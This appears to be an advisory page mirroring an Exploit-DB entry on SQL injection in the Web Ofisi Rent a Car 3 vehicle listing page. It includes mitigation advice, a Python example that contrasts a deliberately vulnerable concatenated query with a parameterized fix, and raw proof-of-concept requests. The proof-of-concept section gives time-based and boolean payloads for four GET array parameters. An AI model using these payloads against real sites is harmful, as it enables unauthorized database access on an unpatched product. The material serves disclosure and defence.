Vendor: Web Ofisi Rent a Car 3
By: Ahmet Ümit BAYRAM
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Web Ofisi Rent a Car 3
Affected Version From: v3
Affected Version To: v3
Patch Exists: NO
Related CWE:
CPE: a:web_ofisi:rent_a_car_v3
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
Year: 2019

Web Ofisi Rent a Car 3 – ‘klima’ SQL Injection

The Web Ofisi Rent a Car 3 application is vulnerable to SQL Injection. Several GET parameters of the vehicle listing page (arac-listesi.html) are passed into database queries without sanitisation, including the array parameters 'kategori[]', 'klima[]', 'vites[]' and 'yakit[]'. An attacker can exploit these flaws to execute arbitrary SQL commands on the underlying database.

Mitigation:

To mitigate this vulnerability, validate every input and use parameterized queries: each element of the array parameters should be checked against its expected type (an integer id) and bound through a placeholder of a prepared statement rather than concatenated into the SQL string. Stored procedures that take typed parameters can also help protect against SQL Injection.
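An added example (not code from the vendor or from the advisory) of the fix the mitigation describes, in Python with an in-memory SQLite table standing in for the application's database; the table and column names, the sample rows and the parameter handling are assumptions. `vulnerable_query` rebuilds the flaw by concatenating the GET arrays into `IN (...)` lists; `safe_filter` allowlists the parameter names, requires integer values and binds each element through a placeholder, so the advisory's boolean payload is rejected before it reaches the engine.

```python
import sqlite3

# Constructed sample rows standing in for the application's car table:
# (id, kategori, klima, vites, yakit). Schema and names are assumptions.
SAMPLE_CARS = [(1, 1, 1, 1, 1), (2, 1, 0, 1, 2), (3, 2, 1, 2, 1)]

# Allowlist of filter parameters the listing page accepts (from the advisory URL).
FILTER_PARAMS = ("kategori", "klima", "vites", "yakit")


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE arac (id INTEGER, kategori INTEGER, "
                 "klima INTEGER, vites INTEGER, yakit INTEGER)")
    conn.executemany("INSERT INTO arac VALUES (?,?,?,?,?)", SAMPLE_CARS)
    return conn


def vulnerable_query(params):
    """The flawed pattern: raw GET array values concatenated into IN (...) lists,
    so any SQL expression in a value is evaluated by the database."""
    clauses = [f"{name} IN ({','.join(values)})" for name, values in params.items() if values]
    return "SELECT id FROM arac WHERE " + " AND ".join(clauses)


def safe_filter(params):
    """Hardened form: only allowlisted columns, integer-only values, one '?'
    placeholder per element. Returns (sql, bound_values) for a parameterized execute."""
    clauses, bound = [], []
    for name in FILTER_PARAMS:          # unknown parameter names are ignored
        values = params.get(name, [])
        if not values:
            continue
        for v in values:
            if not (isinstance(v, str) and v.isdigit()):
                raise ValueError(f"{name}[] must contain only integers")
        clauses.append(f"{name} IN ({','.join('?' * len(values))})")
        bound.extend(int(v) for v in values)
    sql = "SELECT id FROM arac" + (" WHERE " + " AND ".join(clauses) if clauses else "")
    return sql, bound


def run_safe(params):
    """Execute the parameterized filter and return matching car ids."""
    sql, bound = safe_filter(params)
    return [row[0] for row in _connect().execute(sql, bound)]


def run_vulnerable(params):
    """Execute the concatenated query (for comparison only)."""
    return [row[0] for row in _connect().execute(vulnerable_query(params))]
```

With the concatenated query the advisory's tautology in 'klima[]' is evaluated by the engine and returns the same rows as an honest `klima[]=1`, which is exactly the oracle a boolean-based probe relies on; the hardened path raises before any SQL is built.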

Exploit-DB raw data:

# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
# Demo Site: http://demobul.net/rentacarv3/
# Version: v3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: kategori[] (GET)
Payload: if(now()=sysdate(),sleep(0),0)

----- PoC 2: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: klima[] (GET)
Payload: 1 AND 3*2*1=6 AND 695=695

----- PoC 3: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 5: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: yakit[] (GET)
Payload: 1 AND 3*2*1=6 AND 602=602